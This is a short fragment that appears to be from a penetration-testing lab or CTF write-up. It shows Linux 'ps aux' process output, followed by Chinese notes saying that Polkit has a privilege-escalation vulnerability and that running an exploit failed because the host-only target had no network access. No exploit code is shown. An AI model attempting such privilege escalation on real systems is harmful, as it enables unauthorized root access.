thugger 2806 0.0 0.2 319464 8992 ? Ssl 12:26 0:00 /usr/libexec/gvfs-afc-volume-m
thugger 2832 0.0 0.1 164988 6564 ? Ssl 12:26 0:00 /usr/libexec/gvfsd-metadata
thugger 2870 0.0 0.1 13988 5880 ? S 12:26 0:00 sshd: thugger@pts/0
thugger 2880 0.0 0.1 13344 5268 pts/0 Ss 12:26 0:00 -bash
root 2896 0.0 0.0 0 0 ? I 12:26 0:00 [kworker/u2:1-events_power_eff
thugger 3496 0.0 0.0 14220 3516 pts/0 R+ 12:33 0:00 ps aux
Polktid,有其相关的提权漏洞
执行失败,可能是因为我将目标主机的网络设为host-only, 而这个exploit需要联网。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
